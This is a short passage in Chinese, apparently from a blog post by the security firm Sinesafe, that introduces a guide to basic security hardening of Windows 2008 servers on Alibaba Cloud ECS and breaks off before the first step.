最近我们Sinesafe安全公司在为客户使用阿里云ecs服务器做安全的过程中,发现服务器基础安全性都没有做。为了为站长们提供更加有效的安全基础解决方案,我们Sinesafe将对阿里云服务器win2008 系统进行基础安全部署实战过程! 比较重要的几部分 1.
11862 0
+关注
6820
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
JS零基础入门教程(上册)
立即下载
性能优化方法论
立即下载
手把手学习日志服务SLS,云启实验室实战指南
立即下载